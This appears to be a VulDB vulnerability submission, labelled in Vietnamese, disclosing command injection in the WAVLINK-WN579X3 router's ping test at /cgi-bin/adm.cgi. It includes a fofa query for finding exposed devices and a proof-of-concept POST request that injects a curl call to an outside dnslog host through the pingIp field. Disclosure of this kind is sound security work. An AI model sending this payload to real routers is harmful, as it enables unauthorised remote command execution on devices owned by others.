| tiêu đề | WAVLINK-WN579X3 adm.cgi Remote Command Execution |
|---|
| Mô tả | A remote command execution vulnerability has been found in WAVLINK-WN579X3. The vulnerable function is the Ping-Test function, an attacker can execute arbitrary system command by malicious injection to parameter pingIp.
fofa:app="WAVLINK-WN579X3"
POC:
---------------------------------------
POST /cgi-bin/adm.cgi HTTP/1.1
Host: ******
page=ping_test&CCMD=4&pingIp=x.x.x.x%3Bcurl+http%3A%2F%2Fnhjt4ugt.dnslog.pw
---------------------------------------
See details in https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md |
|---|
| Nguồn | ⚠️ https://github.com/sleepyvv/vul_report/blob/main/WAVLINK/WAVLINK-WN579X3-RCE.md |
|---|
| Người dùng | WWesleywww (UID 43117) |
|---|
| Đệ trình | 15/06/2023 15:01 (cách đây 3 những năm) |
|---|
| Kiểm duyệt | 23/06/2023 11:15 (8 days later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 232236 [Wavlink WN579X3 đến 20230615 Ping Test /cgi-bin/adm.cgi pingIp nâng cao đặc quyền] |
|---|
| điểm | 20 |
|---|